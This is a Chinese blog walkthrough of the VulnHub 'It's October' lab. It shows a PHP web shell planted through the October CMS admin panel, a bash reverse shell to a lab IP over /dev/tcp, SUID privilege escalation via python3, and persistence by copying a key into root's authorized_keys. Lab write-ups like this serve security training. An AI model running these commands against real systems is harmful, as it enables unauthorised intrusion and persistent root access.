NO.10 It,s October 靶场

admin

138635
文章

114
评论

2024年11月11日23:41:55评论6 views字数 945阅读3分9秒阅读模式

01.靶场介绍

Description

Welcome to "It’s October"

This boot to root VM is designed for testing your pentesting skills and concepts. It consists of some well known things but it encourages you to use the functionalities rather than vulnerabilities of target.

描述

欢迎来到“十月”

此引导至根 VM 旨在测试您的渗透测试技能和概念。它由一些众所周知的东西组成，但它鼓励您使用功能而不是目标的漏洞。

目标：获取目标的根标志。

难度：简单/中级

靶场链接：www.vulnhub.com/entry/its-october-1,460/

02.信息收集

端口信息

NO.10 It,s October 靶场

目录信息

NO.10 It,s October 靶场

其他信息

NO.10 It,s October 靶场

使用账号密码登录成功

NO.10 It,s October 靶场

October 1.0.1 版本是存在版本漏洞的，但是尝试了几个失败了

NO.10 It,s October 靶场

03.获取权限

getshell:https://copyfuture.com/blogs-details/20211204051506013K

function onStart(){
    $a= system($_GET['cmd']);
    }

NO.10 It,s October 靶场

反弹一个shell

function onstart(){
      exec("/bin/bash -c 'bash -i > /dev/tcp/192.168.56.101/1234 0>&1'");
}

NO.10 It,s October 靶场

python3 -c "import pty;pty.spawn('/bin/bash')"
export TERM=xterm
Ctrl+z
stty -a
stty raw -echo;fg

04.权限提升

使用suid 进行提权

find / -user root -perm -4000 2>/dev/null

NO.10 It,s October 靶场

python3 -c 'import os; os.execl("/bin/sh", "sh", "-p")'
python3.7 -c 'import pty;pty.spawn("/bin/bash")'

NO.10 It,s October 靶场

接下来上传一个公钥上去，然后把它cp 到目标机器的/root/.ssh/authorized_keys 下

NO.10 It,s October 靶场

然后使用ssh 证书登录成功

NO.10 It,s October 靶场

End

NO.10 It,s October 靶场

原文始发于微信公众号（贝雷帽SEC）：NO.10 It,s October 靶场

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

NO.10 It,s October 靶场

01.靶场介绍

Description

描述

03.获取权限

04.权限提升

Web3 安全入门避坑指南｜剪贴板安全

利用n8n结合ollama-Deepseek大模型创建智能体

如何利用图像验证技术识别钓鱼攻击？

Webshell免杀思路-PHP篇-1：经典混淆的艺术

CimFS：内存崩溃，查找系统（内核版）

Astral-PE 是用于本机 Windows PE 文件（x32/x64）的低级变异器（Headers/EP 混淆器）

【通俗易懂说AI】MCP如何安装以及使用

深入解析 URL 跳转漏洞：审计方法与渗透实战全攻略

记一次前端js加解密泄露引发的漏洞

一文吃透文件上传漏洞！路径遍历、后缀绕过、ZIP炸弹全解析

发表评论